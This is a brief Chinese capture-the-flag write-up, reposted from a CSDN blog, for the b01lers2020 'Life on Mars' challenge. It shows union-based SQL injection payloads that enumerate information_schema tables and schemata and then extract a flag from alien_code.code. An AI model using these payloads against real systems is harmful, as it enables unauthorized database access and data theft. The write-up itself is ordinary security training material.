[b01lers2020]Life on Mars 一个接口的sql schema.schemate表
2023-12-14 10:49:41
这里还是很简单的
啥也没有
然后抓包看看
发现传递参数 直接尝试sql
然后如果正确就会返回值 否则 返回1
chryse_planitia union select database(),version()
发现回显 直接开始注入
chryse_planitia union select database(),version()
chryse_planitia union select database(),group_concat(table_name) from information_schema.tables where table_schema="aliens"
?太多了 不切实际一个一个查 看看有没有其他数据库
chryse_planitia union select database(),group_concat(schema_name) from information_schema.schemata
然后就是正常的注入
最后查值的时候
from alien_code.code 即可
/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code
文章来源:https://blog.csdn.net/m0_64180167/article/details/134865187
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!